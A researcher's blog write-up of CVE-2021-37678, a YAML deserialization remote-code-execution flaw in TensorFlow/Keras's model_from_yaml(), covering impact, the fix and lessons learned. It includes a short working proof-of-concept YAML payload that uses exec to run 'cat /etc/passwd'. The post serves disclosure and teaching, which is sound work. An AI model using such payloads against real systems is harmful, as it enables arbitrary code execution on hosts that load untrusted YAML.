Back in my college days, I was heavily into security research and playing CTFs. One of the bigger things I stumbled on was an RCE vulnerability in Google’s TensorFlow/Keras that eventually became CVE-2021-37678.

This post is basically a write-up of that journey, mostly for documenting what I did and partly to revive my security brain after being a Software Engineer for about 3.5 years.

If you’re into Machine Learning, Python internals, or want to see how something seemingly harmless like YAML can blow up into Remote Code Execution — this one’s for you.

Background#

TensorFlow/Keras used to support loading models from YAML using a function called model_from_yaml(). Here’s the GitHub link of the full code file.

Source:

@keras_export('keras.models.model_from_yaml')
def model_from_yaml(yaml_string, custom_objects=None):
  """Parses a yaml model configuration file and returns a model instance.

  Usage:

  >>> model = tf.keras.Sequential([
  ...     tf.keras.layers.Dense(5, input_shape=(3,)),
  ...     tf.keras.layers.Softmax()])
  >>> try:
  ...   import yaml
  ...   config = model.to_yaml()
  ...   loaded_model = tf.keras.models.model_from_yaml(config)
  ... except ImportError:
  ...   pass

  Args:
      yaml_string: YAML string or open file encoding a model configuration.
      custom_objects: Optional dictionary mapping names
          (strings) to custom classes or functions to be
          considered during deserialization.

  Returns:
      A Keras model instance (uncompiled).

  Raises:
      ImportError: if yaml module is not found.
  """
  if yaml is None:
    raise ImportError('Requires yaml module installed (`pip install pyyaml`).')
  # The method unsafe_load only exists in PyYAML 5.x+, so which branch of the
  # try block is covered by tests depends on the installed version of PyYAML.
  try:
    # PyYAML 5.x+
    config = yaml.unsafe_load(yaml_string)
  except AttributeError:
    config = yaml.load(yaml_string)
  from tensorflow.python.keras.layers import deserialize  # pylint: disable=g-import-not-at-top
  return deserialize(config, custom_objects=custom_objects)

And this is how we use the function.

from tensorflow.keras import models

iam_a_poor_harmless_yaml = '''
name: Arjun Shibu
age: 26
status: single
'''

model = models.model_from_yaml(iam_a_poor_harmless_yaml)
print(model)

Seems innocent, right? Just a guy (me), his age, and his relationship status😭. What could possibly go wrong?

Output:

Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/local/lib/python3.12/dist-packages/tensorflow/python/keras/layers/serialization.py", line 113, in deserialize
    return generic_utils.deserialize_keras_object(
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/dist-packages/tensorflow/python/keras/utils/generic_utils.py", line 650, in deserialize_keras_object
    (cls, cls_config) = class_and_config_for_serialized_keras_object(
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/dist-packages/tensorflow/python/keras/utils/generic_utils.py", line 543, in class_and_config_for_serialized_keras_object
    raise ValueError('Improper config format: ' + str(config))
ValueError: Improper config format: {'name': 'Arjun Shibu', 'age': 26, 'status': 'single'}

Of course, the function would try to deserialize this into a Keras model and fail — because this YAML isn’t a model.

In other words:

YAML → Python dictionary
Python dictionary → “Let me try to interpret this as a neural network”
TensorFlow → “Okay, YAML says your model’s name is Arjun Shibu, it’s 26 layers old, and its training status is single… Hmm… doesn’t look like a Keras model… I’m just gonna crash now.”

But for real use cases, just load an actual model architecture from YAML and continue with your day.

Well… not exactly.

Under the hood, Keras was using yaml.unsafe_load() for deserializing the YAML input. The keyword here is unsafe — as in “will literally construct attacker-controlled Python objects”.

Whenever you give developers the power to deserialize anything without restrictions, attackers get the power to do anything too.

The Vulnerability#

The issue was simple but severe:

TensorFlow/Keras used yaml.unsafe_load() internally.
unsafe_load() allows arbitrary Python object creation.
An attacker could provide a crafted YAML file.
When the victim (a server with capability to upload and parse YAML models) loaded it using model_from_yaml(), arbitrary code execution could occur.

The vulnerability is a classic CWE-502: Deserialization of Untrusted Data.

Here’s an example of the kind of malicious payload that could be used:

from tensorflow.keras import models

iam_not_that_harmless_yaml = '''
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"
'''

models.model_from_yaml(iam_not_that_harmless_yaml)

What this does:

It instructs the YAML deserializer to construct a type object.
It uses exec as an operation to run.
The listitems field contains arbitrary code to execute the UNIX command cat /etc/passwd through os.system() function in Python.

If fed into model_from_yaml(), it would execute the code in the running process — instant RCE. No GPU required.

Impact#

If someone could trick you or an automated system into loading a malicious YAML model:

They could execute any system command the process has permission to run.
They could read sensitive files, perform lateral movement, or subvert CI/CD and training pipelines.
Shared research environments, model-serving endpoints, or automated model ingestion services are particularly at risk.

This wasn’t theoretical — it was practically exploitable and carried real-world impact.

The Fix#

The TensorFlow maintainers chose a straightforward and safe approach — Remove YAML-based model loading support.

The YAML deserialization support was dropped and fixes were shipped in TensorFlow 2.6.0, and backported to 2.5.1, 2.4.3, and 2.3.4.

The recommended alternatives for model serialization are formats that do not allow arbitrary code execution during load, such as well-structured JSON formats.

Lessons Learned#

A few takeaways from this work:

ML frameworks are large attack surfaces. People often forget that ML tooling interacts with data and artifacts coming from many untrusted sources.
Serialization formats can be dangerous. YAML is flexible and powerful, but that flexibility can be abused. Using unsafe_load() on untrusted input is a recipe for disaster.
Big projects can have simple but severe flaws. You don’t need to find complex heap corruptions to make a big impact; sometimes one unsafe function call is enough.

Closing thoughts#

This vulnerability was one of the larger things I found during my early security days. It’s a good reminder of why I like this field: understanding how systems behave under the hood and thinking about ways they can be abused.

TensorFlow CVE-2021-37678 – YAML Deserialization RCE